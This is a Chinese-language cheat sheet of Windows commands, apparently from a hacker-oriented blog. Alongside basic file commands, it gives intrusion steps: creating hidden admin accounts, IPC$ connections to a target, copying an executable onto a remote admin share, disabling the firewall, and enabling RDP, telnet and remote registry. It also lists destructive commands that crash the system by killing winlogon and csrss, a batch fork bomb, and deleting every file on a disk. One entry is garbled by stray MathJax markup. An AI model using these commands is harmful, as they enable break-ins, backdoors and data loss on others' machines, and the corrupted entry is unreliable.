win相关DOS命令

net user 用户名 密码 /add (建立用户)

net localgroup administrators 用户名 /add (将用户加到管理员，使其拥有管理权限)

net user guest /active:Yes (激活guest用户)

net user guest 12345 (修改guest密码为12345)

net user (查看账号属性)

net use \ip\ipc$ "" /user (建立空IPC链接)

net use \ip\ipc$ "密码" /user:"用户名" (建立IPC非空链接，非空链接就是需要帐户和密码)

net use \ip\ipc$ /del (删除IPC空链接)

net start (查看开启了哪些服务)

net start 服务名 (开启服务)

net time \目标IP (查看对方时间)

net view (查看本地局域网开启了哪些共享)

net share (查看本地开启的哪些共享)

net share C$/del (删除C：共享)

netstat -a (查看计算机开放了哪些端口)

netstat -n (查看端口的网络连接情况)

nbtstat -A ip (对方136到139一个端口开放了就可以查出对方用户名)

Copy xx.exe\ip\admin\System32(将当前xx.exe复制到对方Admin将</mo></mrow><mrow class="MJX-TeXAtom-ORD"><mo>当</mo></mrow><mrow class="MJX-TeXAtom-ORD"><mo>前</mo></mrow><mi>x</mi><mi>x</mi><mo>.</mo><mi>e</mi><mi>x</mi><mi>e</mi><mrow class="MJX-TeXAtom-ORD"><mo>复</mo></mrow><mrow class="MJX-TeXAtom-ORD"><mo>制</mo></mrow><mrow class="MJX-TeXAtom-ORD"><mo>到</mo></mrow><mrow class="MJX-TeXAtom-ORD"><mo>对</mo></mrow><mrow class="MJX-TeXAtom-ORD"><mo>方</mo></mrow><mi>A</mi><mi>d</mi><mi>m</mi><mi>i</mi><mi>n</mi></math> <script id="MathJax-Element-1" type="math/tex">\System32 (将当前xx.exe复制到对方Admin</script> 共享的System32目录内)

sc config tlntsvr start= auto(修改telnet服务的启动方式为自动，auto前面有一个空格)

net stop sharedaccess(关闭系统自带的防火墙)

net send IP 消息(利用messenger服务向目标IP发送消息)

ntsd -c q -pn winlogon.exe(蓝屏重启)

ntsd -c q -pn csrss.exe(死机)

tasklist(查看进程)

taskkill(结束进程)

开启禁用的telnet服务：

sc config tlntsvr start= auto(auto前有空格)

开启3389远程终端

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0 /f

开启C盘默认共享

net share c$=c:

开启计划任务服务（at命令需要这一服务）

net start schedule

开启远程注册表(Remote Registry)服务

net start remoteregistry

1.重复执行某条命令直至死机的批处理代码：

start cmd

%0

2.复制一个文件的磁盘的每个子文件夹当中：

for /r /d %a in (*) do copy test.txt "%a" /y

3.不停地执行同一条命令：

for /l %a in (1,0,2) do net send 192.168.2.25 “Hi！"

4.死机,蓝屏

ntsd -c q -pn winlogon.exe

ntsd -c q -pn csrss.exe

5.自删除，批处理文件名为delme.bat

……

del delme.bat

6.删除磁盘所有文件：

del * /a /s /q /f

7.创建名字为空的文件夹：

md (按住Alt键，在小键盘上按2,5,5,然后松开Alt,回车)

8.创建无法删除的特殊名字文件夹：

md \.\c:\con

md \.\c:\aux

9.创建无法双击打开无法删除的另类文件夹：

md test..\

rd test..\ /s /q

Cd 切换目录

Dir 列出所有文件信息

Del 删除文件

Md 创建目录 Rd删除目录

Copy 复制

Xcopy 复制文件和文件夹

Cls 清屏

Attrib 修改文件、文件夹属性

Date、Time显示日期、时间

Path 系统路径

Set 显示、设置系统信息

Ren(Rename)重命名

Subst 虚拟磁盘

Ver 显示操作系统版本

Help 帮助

Systeminfo 查看系统软硬件信息

/? 显示某条命令的帮助